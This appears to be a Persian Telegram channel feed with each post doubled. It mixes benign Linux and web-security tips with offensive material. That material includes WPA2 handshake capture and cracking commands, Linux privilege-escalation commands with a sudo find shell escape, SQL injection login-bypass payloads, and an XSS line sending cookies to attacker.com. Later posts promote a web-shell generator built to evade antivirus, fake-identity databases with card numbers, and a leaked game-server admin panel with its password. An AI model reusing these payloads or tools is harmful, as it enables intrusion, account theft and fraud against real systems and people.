پیدا کردن فایلهای حجیم روی سیستم
وقتی هاردت پر میشه، معمولاً نمیدونی چی فضا رو خورده.
find / -type f -size +100M 2>/dev/null
این خط میره کل سیستم رو میگرده، هر فایلی بالای ۱۰۰ مگ رو نشون میده.
چرا 2>/dev/null؟
چون find خیلی جاها دسترسی نداره و ارور میده.
این بخش، ارورها رو میفرسته به سیاهچال.
نسخه حرفهایتر:
find / -type f -size +100M -exec ls -lh {} \; 2>/dev/null | awk '{ print $5, $9 }'
حالا حجم و مسیر فایل رو کنار هم میبینی.
کاربرد دیگه:
توی تست نفوذ، گاهی دنبال فایلهای بکاپ میگردی.
همین دستور رو با ۱۰M اجرا کن، شاید یه backup.sql گیرت بیاد.
#ℳℴ𝒷𝒾𝓃
وقتی هاردت پر میشه، معمولاً نمیدونی چی فضا رو خورده.
find / -type f -size +100M 2>/dev/null
این خط میره کل سیستم رو میگرده، هر فایلی بالای ۱۰۰ مگ رو نشون میده.
چرا 2>/dev/null؟
چون find خیلی جاها دسترسی نداره و ارور میده.
این بخش، ارورها رو میفرسته به سیاهچال.
نسخه حرفهایتر:
find / -type f -size +100M -exec ls -lh {} \; 2>/dev/null | awk '{ print $5, $9 }'
حالا حجم و مسیر فایل رو کنار هم میبینی.
کاربرد دیگه:
توی تست نفوذ، گاهی دنبال فایلهای بکاپ میگردی.
همین دستور رو با ۱۰M اجرا کن، شاید یه backup.sql گیرت بیاد.
#ℳℴ𝒷𝒾𝓃
❤2
مانیتور زنده اتصالات شبکه
میخوای ببینی همین الان سیستمت به کجا وصله؟
watch -n1 "netstat -tunap | grep ESTABLISHED"
چیکار میکنه؟
هر ثانیه لیست اتصالات فعال رو نشون میده.
grep ESTABLISHED فقط اتصالات برقرار شده رو فیلتر میکنه.
خروجی چطوریه؟
یه لیست از IP و پورتها.
ستون آخر، اسم برنامهایه که اتصال رو باز کرده.
چرا مهمه؟
اگه یه برنامه مشکوک ببینی که به IP ناشناس وصله، یعنی یه جای کار میلنگه.
ممکنه یه بدافزار در حال ارسال داده باشه.
نسخه بهروزتر با ss:
watch -n1 "ss -tunap | grep ESTAB"
ss جدیدتره، سریعتره، و روی سیستمهای مدرن بهتر کار میکنه.
نکته امنیتی:
اگه دیدی یه پروسهای مرتب به یه IP خارجی وصل میشه و نمیشناسیش،
PID رو بردار و با ps برو ببین چیه.
#ℳℴ𝒷𝒾𝓃
میخوای ببینی همین الان سیستمت به کجا وصله؟
watch -n1 "netstat -tunap | grep ESTABLISHED"
چیکار میکنه؟
هر ثانیه لیست اتصالات فعال رو نشون میده.
grep ESTABLISHED فقط اتصالات برقرار شده رو فیلتر میکنه.
خروجی چطوریه؟
یه لیست از IP و پورتها.
ستون آخر، اسم برنامهایه که اتصال رو باز کرده.
چرا مهمه؟
اگه یه برنامه مشکوک ببینی که به IP ناشناس وصله، یعنی یه جای کار میلنگه.
ممکنه یه بدافزار در حال ارسال داده باشه.
نسخه بهروزتر با ss:
watch -n1 "ss -tunap | grep ESTAB"
ss جدیدتره، سریعتره، و روی سیستمهای مدرن بهتر کار میکنه.
نکته امنیتی:
اگه دیدی یه پروسهای مرتب به یه IP خارجی وصل میشه و نمیشناسیش،
PID رو بردار و با ps برو ببین چیه.
#ℳℴ𝒷𝒾𝓃
❤2
هدرهای امنیتی که هر سایتی باید داشته باشه
وقتی یه سایت باز میکنی، سرور یه سری هدر میفرسته که مرورگرت رفتارش رو تنظیم کنه.
چک کردنشون خیلی راحته:
curl -I https://example.com
خروجی رو نگاه کن، اینا باید باشن:
X-Frame-Options: DENY
یعنی سایت تو iframe باز نشه. جلوی Clickjacking رو میگیره.
X-Content-Type-Options: nosniff
یعنی مرورگر نوع فایل رو حدس نزنه.
Strict-Transport-Security: max-age=31536000
یعنی مرورگر همیشه از HTTPS استفاده کنه.
Content-Security-Policy: default-src 'self'
یعنی فقط اسکریپتهای خود سایت اجرا بشن.
اگه اینا نبودن چی؟
سایت آسیبپذیره. میتونه هدف XSS، Clickjacking، یا MITM باشه.
ابزار سریع برای چک:
curl -s -D - https://example.com -o /dev/null | grep -i "x-frame\|strict\|content-security"
#ℳℴ𝒷𝒾𝓃
وقتی یه سایت باز میکنی، سرور یه سری هدر میفرسته که مرورگرت رفتارش رو تنظیم کنه.
چک کردنشون خیلی راحته:
curl -I https://example.com
خروجی رو نگاه کن، اینا باید باشن:
X-Frame-Options: DENY
یعنی سایت تو iframe باز نشه. جلوی Clickjacking رو میگیره.
X-Content-Type-Options: nosniff
یعنی مرورگر نوع فایل رو حدس نزنه.
Strict-Transport-Security: max-age=31536000
یعنی مرورگر همیشه از HTTPS استفاده کنه.
Content-Security-Policy: default-src 'self'
یعنی فقط اسکریپتهای خود سایت اجرا بشن.
اگه اینا نبودن چی؟
سایت آسیبپذیره. میتونه هدف XSS، Clickjacking، یا MITM باشه.
ابزار سریع برای چک:
curl -s -D - https://example.com -o /dev/null | grep -i "x-frame\|strict\|content-security"
#ℳℴ𝒷𝒾𝓃
❤3
OSINT چیه و چرا اولین قدم هر عملیاته
قبل از اینکه به چیزی حمله کنی، باید بدونی طرف چیه.
OSINT یعنی جمعآوری اطلاعات از منابع عمومی.
سه تا منبع طلایی:
۱. whois
whois example.com
اسم صاحب دامنه، ایمیل، شماره تلفن، تاریخ ثبت.
اگه حریم خصوصی فعال نباشه، همه چی لو میره.
۲. crt.sh
برو به crt.sh و دامنه رو سرچ کن.
همه زیردامنههای ثبتشده رو نشون میده.
این یه معدن طلاست برای پیدا کردن پنلهای مخفی.
۳. Shodan
موتور جستجوی دستگاههاست، نه سایتها.
میتونی سرچ کنی: org:"Target Company"
همه سرورهای اون شرکت با پورتهای بازشون.
نکته:
هیچوقت با اکانت شخصیت این کارها رو نکن.
یه VM جدا، یه VPN، یه مرورگر جدا.
#ℳℴ𝒷𝒾𝓃
قبل از اینکه به چیزی حمله کنی، باید بدونی طرف چیه.
OSINT یعنی جمعآوری اطلاعات از منابع عمومی.
سه تا منبع طلایی:
۱. whois
whois example.com
اسم صاحب دامنه، ایمیل، شماره تلفن، تاریخ ثبت.
اگه حریم خصوصی فعال نباشه، همه چی لو میره.
۲. crt.sh
برو به crt.sh و دامنه رو سرچ کن.
همه زیردامنههای ثبتشده رو نشون میده.
این یه معدن طلاست برای پیدا کردن پنلهای مخفی.
۳. Shodan
موتور جستجوی دستگاههاست، نه سایتها.
میتونی سرچ کنی: org:"Target Company"
همه سرورهای اون شرکت با پورتهای بازشون.
نکته:
هیچوقت با اکانت شخصیت این کارها رو نکن.
یه VM جدا، یه VPN، یه مرورگر جدا.
#ℳℴ𝒷𝒾𝓃
❤3
تفاوت رمزنگاری و هش کردن، یه بار برای همیشه
اکثر مردم این دوتا رو قاطی میکنن.
ولی فرقشون مثل فرق قفل و چرخگوشته.
رمزنگاری:
ورودی رو میگیری، با کلید قفلش میکنی.
با همون کلید بازش میکنی.
برگشتپذیره.
هش:
ورودی رو میگیری، یه خروجی ثابت میگیری.
هیچ کلیدی نیست.
برگشتناپذیره.
پس کِی از کدوم استفاده کنیم؟
رمزنگاری: برای دادهای که بعداً باید بخونیم.
مثل فایل، پیام، دیتابیس.
هش: برای دادهای که فقط باید چک کنیم.
مثل پسورد، امضای دیجیتال، بلاکچین.
چرا پسورد رو هش میکنن نه رمزنگاری؟
چون اگه رمزنگاری کنن، کلید کجاست؟
اگه کلید لو بره، همه پسوردها لو میره.
ولی هش، حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
مگر اینکه پسورد ضعیف باشه و کرک بشه.
#ℳℴ𝒷𝒾𝓃
اکثر مردم این دوتا رو قاطی میکنن.
ولی فرقشون مثل فرق قفل و چرخگوشته.
رمزنگاری:
ورودی رو میگیری، با کلید قفلش میکنی.
با همون کلید بازش میکنی.
برگشتپذیره.
هش:
ورودی رو میگیری، یه خروجی ثابت میگیری.
هیچ کلیدی نیست.
برگشتناپذیره.
پس کِی از کدوم استفاده کنیم؟
رمزنگاری: برای دادهای که بعداً باید بخونیم.
مثل فایل، پیام، دیتابیس.
هش: برای دادهای که فقط باید چک کنیم.
مثل پسورد، امضای دیجیتال، بلاکچین.
چرا پسورد رو هش میکنن نه رمزنگاری؟
چون اگه رمزنگاری کنن، کلید کجاست؟
اگه کلید لو بره، همه پسوردها لو میره.
ولی هش، حتی اگه دیتابیس لو بره، پسورد مستقیم لو نمیره.
مگر اینکه پسورد ضعیف باشه و کرک بشه.
#ℳℴ𝒷𝒾𝓃
❤5
حمله به وایفای، همون چیزی که تو فیلمها میبینی
همه فکر میکنن هک وایفای یعنی کرک کردن پسورد.
ولی داستان چیز دیگهایه.
وایفای با WPA2 رمزنگاری میشه.
پسورد رو نمیتونی مستقیم بخونی.
ولی میتونی Handshake رو بگیری.
Handshake چیه؟
وقتی یه دستگاه به وایفای وصل میشه، یه تبادل رمزنگاری شده انجام میشه.
این تبادل، شامل پسورد هش شدهست.
مراحل:
۱. بری تو حالت مانیتور
airmon-ng start wlan0
۲. شبکهها رو ببینی
airodump-ng wlan0mon
۳. هندشیک بگیری
airodump-ng -c 6 --bssid MAC -w capture wlan0mon
۴. با Deauth، دستگاه رو قطع کنی تا دوباره وصل شه
aireplay-ng -0 5 -a MAC wlan0mon
۵. حالا یه فایل capture داری که هندشیک توشه.
۶. با wordlist کرکش کنی
aircrack-ng -w rockyou.txt capture-01.cap
نکته:
اگه پسورد قوی باشه، این روش هیچوقت جواب نمیده.
پسورد ۱۲ کاراکتری رندوم، میلیونها سال طول میکشه.
#ℳℴ𝒷𝒾𝓃
همه فکر میکنن هک وایفای یعنی کرک کردن پسورد.
ولی داستان چیز دیگهایه.
وایفای با WPA2 رمزنگاری میشه.
پسورد رو نمیتونی مستقیم بخونی.
ولی میتونی Handshake رو بگیری.
Handshake چیه؟
وقتی یه دستگاه به وایفای وصل میشه، یه تبادل رمزنگاری شده انجام میشه.
این تبادل، شامل پسورد هش شدهست.
مراحل:
۱. بری تو حالت مانیتور
airmon-ng start wlan0
۲. شبکهها رو ببینی
airodump-ng wlan0mon
۳. هندشیک بگیری
airodump-ng -c 6 --bssid MAC -w capture wlan0mon
۴. با Deauth، دستگاه رو قطع کنی تا دوباره وصل شه
aireplay-ng -0 5 -a MAC wlan0mon
۵. حالا یه فایل capture داری که هندشیک توشه.
۶. با wordlist کرکش کنی
aircrack-ng -w rockyou.txt capture-01.cap
نکته:
اگه پسورد قوی باشه، این روش هیچوقت جواب نمیده.
پسورد ۱۲ کاراکتری رندوم، میلیونها سال طول میکشه.
#ℳℴ𝒷𝒾𝓃
❤5
بالا رفتن سطح دسترسی در لینوکس، مرحله به مرحله
فرض کن یه شل معمولی گرفتی. user عادی هستی.
حالا باید root بشی.
اولین چک:
sudo -l
این دستور میگه چه دستوراتی رو میتونی با sudo اجرا کنی.
بعضی وقتا یه دستور ساده مثل find یا vim اینجاست که میتونی ازش سوءاستفاده کنی.
مثال:
اگه sudo -l نشون داد:
(ALL) NOPASSWD: /usr/bin/find
میتونی این رو بزنی:
sudo find . -exec /bin/sh \; -quit
حالا root هستی.
چک دوم: فایلهای SUID
find / -perm -4000 -type f 2>/dev/null
این فایلها با دسترسی root اجرا میشن.
بعضیاشون آسیبپذیرن.
چک سوم: کرونجابها
cat /etc/crontab
ls -la /etc/cron.*
اگه یه اسکریپت با دسترسی root اجرا میشه و تو میتونی نوشتش کنی،
فقط یه خط بهش اضافه کن که یه شل بهت بده.
چک چهارم: فایلهای قابل نوشتن
find / -writable -type f 2>/dev/null | grep -v proc
اگه تونستی یه فایل مهم رو ویرایش کنی، راه برای root شدن بازه.
#ℳℴ𝒷𝒾𝓃
فرض کن یه شل معمولی گرفتی. user عادی هستی.
حالا باید root بشی.
اولین چک:
sudo -l
این دستور میگه چه دستوراتی رو میتونی با sudo اجرا کنی.
بعضی وقتا یه دستور ساده مثل find یا vim اینجاست که میتونی ازش سوءاستفاده کنی.
مثال:
اگه sudo -l نشون داد:
(ALL) NOPASSWD: /usr/bin/find
میتونی این رو بزنی:
sudo find . -exec /bin/sh \; -quit
حالا root هستی.
چک دوم: فایلهای SUID
find / -perm -4000 -type f 2>/dev/null
این فایلها با دسترسی root اجرا میشن.
بعضیاشون آسیبپذیرن.
چک سوم: کرونجابها
cat /etc/crontab
ls -la /etc/cron.*
اگه یه اسکریپت با دسترسی root اجرا میشه و تو میتونی نوشتش کنی،
فقط یه خط بهش اضافه کن که یه شل بهت بده.
چک چهارم: فایلهای قابل نوشتن
find / -writable -type f 2>/dev/null | grep -v proc
اگه تونستی یه فایل مهم رو ویرایش کنی، راه برای root شدن بازه.
#ℳℴ𝒷𝒾𝓃
❤4
حمله به فرم لاگین، چرا پسورد مهم نیست
اکثر هکرهای مبتدی فکر میکنن باید پسورد رو کرک کنن.
ولی حرفهایها سراغ خود فرم نمیرن.
مثال:
یه فرم لاگین ساده:
username: admin
password: any
چک کن اگه فقط یوزرنیم رو بذاری چی میشه.
بعضی فرمها فقط یوزرنیم چک میکنن.
یا:
username: admin'--
password: any
اگه دیتابیس MySQL باشه، این کوئری اجرا میشه:
SELECT * FROM users WHERE username='admin'--' AND password='any'
تو کامنت --، بقیه کوئری نادیده گرفته میشه.
پسورد اصلاً چک نمیشه.
یا:
username: admin
password: ' OR '1'='1
کوئری میشه:
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'
چون 1=1 همیشه درسته، همه رکوردها برمیگردن.
وارد میشی.
یا:
username: admin
password: ' OR 1=1 LIMIT 1--
حالا فقط اولین کاربر برمیگرده.
نکته:
همه اینا به شرطیه که سایت از Prepared Statement استفاده نکنه.
اگه استفاده کنه، هیچکدوم کار نمیکنه.
#ℳℴ𝒷𝒾𝓃
اکثر هکرهای مبتدی فکر میکنن باید پسورد رو کرک کنن.
ولی حرفهایها سراغ خود فرم نمیرن.
مثال:
یه فرم لاگین ساده:
username: admin
password: any
چک کن اگه فقط یوزرنیم رو بذاری چی میشه.
بعضی فرمها فقط یوزرنیم چک میکنن.
یا:
username: admin'--
password: any
اگه دیتابیس MySQL باشه، این کوئری اجرا میشه:
SELECT * FROM users WHERE username='admin'--' AND password='any'
تو کامنت --، بقیه کوئری نادیده گرفته میشه.
پسورد اصلاً چک نمیشه.
یا:
username: admin
password: ' OR '1'='1
کوئری میشه:
SELECT * FROM users WHERE username='admin' AND password='' OR '1'='1'
چون 1=1 همیشه درسته، همه رکوردها برمیگردن.
وارد میشی.
یا:
username: admin
password: ' OR 1=1 LIMIT 1--
حالا فقط اولین کاربر برمیگرده.
نکته:
همه اینا به شرطیه که سایت از Prepared Statement استفاده نکنه.
اگه استفاده کنه، هیچکدوم کار نمیکنه.
#ℳℴ𝒷𝒾𝓃
❤5
XSS چیه و چرا خطرناکه
XSS یعنی تزریق جاوااسکریپت به صفحهای که کاربر دیگه میبینه.
سه نوع داره:
۱. Reflected XSS
کد تو URL هست و تو همون لحظه اجرا میشه.
مثال:
example.com/search?q=<script>alert(1)</script>
۲. Stored XSS
کد تو دیتابیس ذخیره میشه و هر کسی صفحه رو باز کنه، اجرا میشه.
مثال: کامنت تو یه وبلاگ.
هر بازدیدکننده، کد رو اجرا میکنه.
۳. DOM-based XSS
کد تو جاوااسکریپت خود سایت پردازش میشه.
بدون درخواست به سرور.
چرا خطرناکه؟
چون با یه XSS میتونی:
کوکی کاربر رو بدزدی
سشنش رو بربایی
فرم لاگین جعلی نشون بدی
کل صفحه رو تغییر بدی
کیلاگر نصب کنی
مثال سرقت کوکی:
<script>new Image().src='//attacker.com?c='+document.cookie</script>
این یه درخواست به سرور هکر میفرسته با کوکی قربانی.
دفاع:
همیشه ورودی کاربر رو Encode کن.
از Content-Security-Policy استفاده کن.
کوکیها رو HttpOnly کن.
#ℳℴ𝒷𝒾𝓃
XSS یعنی تزریق جاوااسکریپت به صفحهای که کاربر دیگه میبینه.
سه نوع داره:
۱. Reflected XSS
کد تو URL هست و تو همون لحظه اجرا میشه.
مثال:
example.com/search?q=<script>alert(1)</script>
۲. Stored XSS
کد تو دیتابیس ذخیره میشه و هر کسی صفحه رو باز کنه، اجرا میشه.
مثال: کامنت تو یه وبلاگ.
هر بازدیدکننده، کد رو اجرا میکنه.
۳. DOM-based XSS
کد تو جاوااسکریپت خود سایت پردازش میشه.
بدون درخواست به سرور.
چرا خطرناکه؟
چون با یه XSS میتونی:
کوکی کاربر رو بدزدی
سشنش رو بربایی
فرم لاگین جعلی نشون بدی
کل صفحه رو تغییر بدی
کیلاگر نصب کنی
مثال سرقت کوکی:
<script>new Image().src='//attacker.com?c='+document.cookie</script>
این یه درخواست به سرور هکر میفرسته با کوکی قربانی.
دفاع:
همیشه ورودی کاربر رو Encode کن.
از Content-Security-Policy استفاده کن.
کوکیها رو HttpOnly کن.
#ℳℴ𝒷𝒾𝓃
❤4
Shell 🐚 Generator.html
41.4 KB
Shell Generator 🐚 DarkPacket
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
یک ابزار، هشت زبان
PHP · ASP · JSP · Node.js · Python · Perl · Ruby · Bash
هر زبان قابلیتهای مخصوص خودش رو داره — از اجرای فرمان و eval تا شل معکوس، بایند شل، MySQL Dump و Thread Enumeration
پشتیبانی از کلید ساده، MD5 و SHA1 با پارامتر تصادفی
قابلیتهای پرقدرت: اجرای فرمان · لیست فایل · خواندن/نوشتن · آپلود/دانلود · اطلاعات سرور · کوئری SQL · شل معکوس · بایند شل · زیپ · خودتخریبی · خروجی زنده · کپی یککلیکی · دانلود خودکار با پسوند صحیح · راهنمای هوشمند برای هر زبان · شش لایه مبهمسازی Base64 · Hex · XOR · Split · Combo · None برای دور زدن WAF و آنتیویروس
Java Shell 🐚 Generator.html
48.9 KB
ساخت شل جاوا
❤6
user-agents-100000.txt
11.9 MB
دیتابیس عظیم و بسیار قدرتمندی که شامل مجموعهای کامل از ۱۰۰ هزار User-Agent سالم، معتبر و بهروز است.
این پایگاه داده با ارائه طیف وسیعی از شناسههای کاربری استاندارد و غیراستاندارد، امکان شبیهسازی دقیق ترافیک وب را فراهم میکند و برای توسعهدهندگان، برنامهنویسان و متخصصان امنیت سایبری که نیاز به تستهای جامع پراکسی، اسکریپتنویسی خودکار یا تحلیل رفتار مرورگرها دارند، منبعی ایدهآل و غنی به شمار میرود.
all_ipv4_500ips.zip
210.8 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv4) است که پوششدهی جغرافیای آن به ۹۵ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
all_ipv6_500ips.zip
551.4 KB
دیتابیس ارائهشده شامل مجموعهای بسیار گسترده و جامع از آدرسهای اینترنتی نسخه چهار (IPv6) است که پوششدهی جغرافیای آن به ۹۲ کشور مختلف در سراسر جهان گسترش دارد.
این پایگاه داده با ارائه اطلاعات دقیق و بهروز، امکان شناسایی و تحلیل منبع ترافیک از نقاط مختلف جهان را فراهم میکند. بهعنوان یک نمونه از ظرفیت و تنوع این دیتابیس، میتوان به وجود حداقل ۵۰۰ آدرس IP منحصربهفرد و فعال برای هر یک از کشورهای ذکرشده اشاره کرد؛ این حجم از دادهها نشاندهنده عمق و گستردگی پوششدهی شبکهای در سطح بینالمللی است و برای پروژههایی که نیازمند تحلیل جغرافیایی ترافیک یا مدیریت دسترسیها بر اساس موقعیت مکانی کاربران هستند، ابزاری ارزشمند و کارآمد به شمار میرود.
fake_identities_10countries_10cities_100pergender_2026-09-11.zip
15.3 MB
دیتابیس بسیار قوی شامل ۲۰ هزار اطلاعات داینامیک برای هویت جعلی.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
۱۰ کشور: ایران، روسیه، آمریکا، آلمان، فرانسه، انگلیس، ژاپن، برزیل، هند، چین.
شهرهای واقعی: تهران، Москва و Los Angeles.
[PERSONAL]: مشخصات فردی
First Name: نام کوچک واقعی بر اساس کشور و جنسیت
Last Name: نام خانوادگی واقعی بر اساس کشور
Full Name: نام کامل
Gender: Male یا Female
Age: بین ۱۸ تا ۲۶ سال
Birth Year: سال تولد
Nationality: نام کشور
[CONTACT]: اطلاعات تماس
Email: ساختهشده از نام و فامیل
Phone: شماره با کد کشور، مثلاً +98 912 345 6789
Phone (Raw): شماره بدون فرمت
Street: خیابان و پلاک بر اساس خیابانهای واقعی هر کشور
City: شهر
Postal Code: با الگوی واقعی هر کشور، مثلاً ایران ۱۰ رقم و آمریکا ۵ رقم
Country: کشور
[NETWORK]: اطلاعات شبکه
IPv4: با پیشوند شبیه کشور، مثلاً 5.x.x.x برای ایران
MAC Address: آدرس مک تصادفی
[MISC]: اطلاعات متفرقه
Username: نام کاربری
Password: رمز عبور تصادفی
Credit Card: شماره کارت ساختگی با پیشوند ۴
IBAN: شماره شبا ساختگی
proxies-1786199678869.txt
59.7 KB
بیشاز ۱ هزار پروکسی CORS قدرتمند استخراج شده از سایت corsproxy.io
ports.compact.json
822.4 KB
تمام (۶۵۵۳۵) پورتهای جهان + سرویس ارائه دهندهی آنها در قالب JSON
DigitalIdentityProfiles (1) (1).zip
25.4 MB
مخزن اطلاعات قدرتمند برای جعل اطلاعات
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
۲۰ کشور، هر کشور ۵ شهر، هر شهر ۳ سرویسدهنده IP، هر سرویس ۲۵ دستگاه txt و ۲۵ دستگاه json.
مجموعاً ۱۵ هزار دستگاه به دو فرمت.
panel.html
141.6 KB
پنل دیتابیس سرور بازی امپراتوری پارس
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
empire2024
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
این پنل، توسط کاربر @Net_activenull استخراج و منتشر شده است.
رمز دسترسی به پنل مدیریت:
برای افزایش سطح امنیت شبکه و جلوگیری از دسترسیهای غیرمجاز، این بسته شامل ۲۰۰ عدد پروکسی CORS میباشد که امکان استفاده امن و مخفیانه از سرویسها را فراهم میکند.
توجه داشته باشید که این محتوا صرفاً با هدف آموزشی و آشنایی با ساختارهای امنیتی ارائه شده است. مسئولیت هرگونه سوءاستفاده، دسترسی غیرمجاز یا استفاده نادرست از این اطلاعات بر عهده کاربر نهایی بوده و هیچگونه ارتباطی با تولیدکنندگان محتوا ندارد.
NLP.html
127.3 KB
ربات قدرتمند Nullspire Ai
قابلیتهای گسترده و پیشرفته:
- دسترسی نامحدود به ۵۳ API عمومی و معتبر: این ربات با اتصال به منابع اطلاعاتی کلیدی مانند گیتهاب (GitHub) برای مدیریت کدها و پروژهها، ویکیپدیا (Wikipedia) برای دسترسی به دانش عمومی، و همچنین مجموعهای از سایتهای تخصصی اطلاعاتی و پایگاههای داده، امکان جمعآوری و پردازش حجم عظیمی از دادهها را فراهم میسازد.
- ابزارهای حرفهای OSINT (هوشیابی منابع باز): Nullspire Ai مجهز به موتورهای جستجوی هوشمند است که فرآیند جمعآوری اطلاعات از منابع باز را بهشکل خودکار و دقیق تسهیل میکند. این قابلیت برای تحلیلهای عمیق، پایش اخبار و کشف اطلاعات پنهان بسیار مؤثر است.
- شخصیسازی بالا و انعطافپذیری: کاربران میتوانند با تنظیمات دقیق و شخصیسازی شده، رفتار ربات را مطابق با نیازهای خاص خود تنظیم کنند تا خروجیها کاملاً متناسب با اهداف آنها باشد.
- قدرت پردازش و سرعت بالا: با پشتیبانی از پردازش همزمان درخواستها و پاسخگویی سریع، Nullspire Ai برای انجام پروژههای بزرگ و پیچیده ایدهآل است.
❤5